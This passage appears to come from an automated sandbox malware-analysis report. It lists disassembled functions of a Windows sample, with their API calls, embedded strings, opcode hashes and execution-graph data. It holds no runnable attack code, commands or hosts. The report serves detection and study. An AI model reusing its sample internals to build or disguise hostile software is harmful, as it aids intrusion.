                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040F673
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                    • strlen.MSVCRT ref: 0040F6A2
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040F6E2
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                    • strlen.MSVCRT ref: 0040F70D
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00402FD7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                    • strlen.MSVCRT ref: 00403006
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                    • GetStockObject.GDI32(00000000), ref: 004143C6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                    • String ID:
                    • API String ID: 764393265-0
                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                    Download Yara Rule
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$System$File$LocalSpecific
                    • String ID:
                    • API String ID: 979780441-0
                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • memcpy.MSVCRT ref: 004134E0
                    • memcpy.MSVCRT ref: 004134F2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$DialogHandleModuleParam
                    • String ID:
                    • API String ID: 1386444988-0
                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: InvalidateMessageRectSend
                    • String ID: d=E
                    • API String ID: 909852535-3703654223
                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 0040F79E
                    • wcschr.MSVCRT ref: 0040F7AC
                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcschr$memcpywcslen
                    • String ID: "
                    • API String ID: 1983396471-123907689
                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • _memicmp.MSVCRT ref: 0040C00D
                    • memcpy.MSVCRT ref: 0040C024
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FilePointer_memicmpmemcpy
                    • String ID: URL
                    • API String ID: 2108176848-3574463123
                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemcpy
                    • String ID: %2.2X
                    • API String ID: 2789212964-323797159
                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf
                    • String ID: %%-%d.%ds
                    • API String ID: 3988819677-2008345750
                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                    Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040E770
                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSendmemset
                    • String ID: F^@
                    • API String ID: 568519121-3652327722
                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PlacementWindowmemset
                    • String ID: WinPos
                    • API String ID: 4036792311-2823255486
                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 0040DCE9
                    • wcscat.MSVCRT ref: 0040DCFF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamewcscatwcsrchr
                    • String ID: _lng.ini
                    • API String ID: 383090722-1948609170
                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                    • API String ID: 2773794195-880857682
                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • memcmp.MSVCRT ref: 00408AF3
                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                    • memcmp.MSVCRT ref: 00408B2B
                    • memcmp.MSVCRT ref: 00408B5C
                    • memcpy.MSVCRT ref: 00408B79
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID:
                    • API String ID: 231171946-0
                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcslen$wcscat$wcscpy
                    • String ID:
                    • API String ID: 1961120804-0
                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                    Execution Graph

                    Execution Coverage:2.4%
                    Dynamic/Decrypted Code Coverage:20.3%
                    Signature Coverage:0.5%
                    Total number of Nodes:848
                    Total number of Limit Nodes:16
                    execution_graph 34120 40fc40 70 API calls 34294 403640 21 API calls 34121 427fa4 42 API calls 34295 412e43 _endthreadex 34296 425115 76 API calls __fprintf_l 34297 43fe40 133 API calls 34124 425115 83 API calls __fprintf_l 34125 401445 memcpy memcpy DialogBoxParamA 34126 440c40 34 API calls 33252 444c4a 33271 444e38 33252->33271 33254 444c56 GetModuleHandleA 33255 444c68 __set_app_type __p__fmode __p__commode 33254->33255 33257 444cfa 33255->33257 33258 444d02 __setusermatherr 33257->33258 33259 444d0e 33257->33259 33258->33259 33272 444e22 _controlfp 33259->33272 33261 444d13 _initterm __getmainargs _initterm 33262 444d6a GetStartupInfoA 33261->33262 33264 444d9e GetModuleHandleA 33262->33264 33273 40cf44 33264->33273 33268 444dcf _cexit 33270 444e04 33268->33270 33269 444dc8 exit 33269->33268 33271->33254 33272->33261 33324 404a99 LoadLibraryA 33273->33324 33275 40cf64 33275->33268 33275->33269 33276 40cf60 33276->33275 33331 410d0e 33276->33331 33278 40cf6f 33335 40ccd7 ??2@YAPAXI 33278->33335 33280 40cf9b 33349 407cbc 33280->33349 33285 40cfc4 33367 409825 memset 33285->33367 33286 40cfd8 33372 4096f4 memset 33286->33372 33291 407e30 _strcmpi 33293 40cfee 33291->33293 33292 40d181 ??3@YAXPAX 33294 40d1b3 33292->33294 33295 40d19f DeleteObject 33292->33295 33297 40cff2 RegDeleteKeyA 33293->33297 33298 40d007 EnumResourceTypesA 33293->33298 33396 407948 ??3@YAXPAX ??3@YAXPAX 33294->33396 33295->33294 33297->33292 33300 40d047 33298->33300 33301 40d02f MessageBoxA 33298->33301 33299 40d1c4 33397 4080d4 ??3@YAXPAX 33299->33397 33303 40d0a0 CoInitialize 33300->33303 33377 40ce70 33300->33377 33301->33292 33394 40cc26 strncat memset RegisterClassA CreateWindowExA 33303->33394 33304 40d1cd 33398 407948 ??3@YAXPAX ??3@YAXPAX 33304->33398 33309 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33395 40c256 PostMessageA 33309->33395 33311 40d061 ??3@YAXPAX 33311->33294 33314 40d084 DeleteObject 33311->33314 33312 40d09e 33312->33303 33314->33294 33316 40d0f9 GetMessageA 33317 40d17b 33316->33317 33318 40d10d 33316->33318 33317->33292 33319 40d113 TranslateAccelerator 33318->33319 33321 40d145 IsDialogMessage 33318->33321 33322 40d139 IsDialogMessage 33318->33322 33319->33318 33320 40d16d GetMessageA 33319->33320 33320->33317 33320->33319 33321->33320 33323 40d157 TranslateMessage DispatchMessageA 33321->33323 33322->33320 33322->33321 33323->33320 33325 404ac4 GetProcAddress 33324->33325 33327 404ae8 33324->33327 33326 404add FreeLibrary 33325->33326 33328 404ad4 33325->33328 33326->33327 33329 404b13 33327->33329 33330 404afc MessageBoxA 33327->33330 33328->33326 33329->33276 33330->33276 33332 410d17 LoadLibraryA 33331->33332 33333 410d3c 33331->33333 33332->33333 33334 410d2b GetProcAddress 33332->33334 33333->33278 33334->33333 33336 40cd08 ??2@YAPAXI 33335->33336 33338 40cd26 33336->33338 33340 40cd2d 33336->33340 33406 404025 6 API calls 33338->33406 33341 40cd66 33340->33341 33342 40cd59 DeleteObject 33340->33342 33399 407088 33341->33399 33342->33341 33344 40cd6b 33402 4019b5 33344->33402 33347 4019b5 strncat 33348 40cdbf _mbscpy 33347->33348 33348->33280 33408 407948 ??3@YAXPAX ??3@YAXPAX 33349->33408 33353 407ddc 33362 407e04 33353->33362 33421 407a1f 33353->33421 33354 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33360 407cf7 33354->33360 33356 407d7a ??3@YAXPAX 33356->33360 33360->33353 33360->33354 33360->33356 33360->33362 33412 40796e 7 API calls 33360->33412 33413 406f30 33360->33413 33409 407a55 33362->33409 33363 407e30 33364 407e57 33363->33364 33366 407e38 33363->33366 33364->33285 33364->33286 33365 407e41 _strcmpi 33365->33364 33365->33366 33366->33364 33366->33365 33427 4097ff 33367->33427 33369 409854 33432 409731 33369->33432 33373 4097ff 3 API calls 33372->33373 33374 409723 33373->33374 33452 40966c 33374->33452 33466 4023b2 33377->33466 33383 40ced3 33555 40cdda 7 API calls 33383->33555 33384 40cece 33387 40cf3f 33384->33387 33507 40c3d0 memset GetModuleFileNameA strrchr 33384->33507 33387->33311 33387->33312 33390 40ceed 33534 40affa 33390->33534 33394->33309 33395->33316 33396->33299 33397->33304 33398->33275 33407 406fc7 memset _mbscpy 33399->33407 33401 40709f CreateFontIndirectA 33401->33344 33403 4019e1 33402->33403 33404 4019c2 strncat 33403->33404 33405 4019e5 memset LoadIconA 33403->33405 33404->33403 33405->33347 33406->33340 33407->33401 33408->33360 33410 407a65 33409->33410 33411 407a5b ??3@YAXPAX 33409->33411 33410->33363 33411->33410 33412->33360 33414 406f37 malloc 33413->33414 33415 406f7d 33413->33415 33417 406f73 33414->33417 33418 406f58 33414->33418 33415->33360 33417->33360 33419 406f6c ??3@YAXPAX 33418->33419 33420 406f5c memcpy 33418->33420 33419->33417 33420->33419 33422 407a38 33421->33422 33423 407a2d ??3@YAXPAX 33421->33423 33425 406f30 3 API calls 33422->33425 33424 407a43 33423->33424 33426 40796e 7 API calls 33424->33426 33425->33424 33426->33362 33443 406f96 GetModuleFileNameA 33427->33443 33429 409805 strrchr 33430 409814 33429->33430 33431 409817 _mbscat 33429->33431 33430->33431 33431->33369 33444 44b090 33432->33444 33437 40930c 3 API calls 33438 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33437->33438 33439 4097c5 LoadStringA 33438->33439 33442 4097db 33439->33442 33441 4097f3 33441->33292 33442->33439 33442->33441 33451 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33442->33451 33443->33429 33445 40973e _mbscpy _mbscpy 33444->33445 33446 40930c 33445->33446 33447 44b090 33446->33447 33448 409319 memset GetPrivateProfileStringA 33447->33448 33449 409374 33448->33449 33450 409364 WritePrivateProfileStringA 33448->33450 33449->33437 33450->33449 33451->33442 33462 406f81 GetFileAttributesA 33452->33462 33454 409675 33455 4096ee 33454->33455 33456 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33454->33456 33455->33291 33463 409278 GetPrivateProfileStringA 33456->33463 33458 4096c9 33464 409278 GetPrivateProfileStringA 33458->33464 33460 4096da 33465 409278 GetPrivateProfileStringA 33460->33465 33462->33454 33463->33458 33464->33460 33465->33455 33557 409c1c 33466->33557 33469 401e69 memset 33596 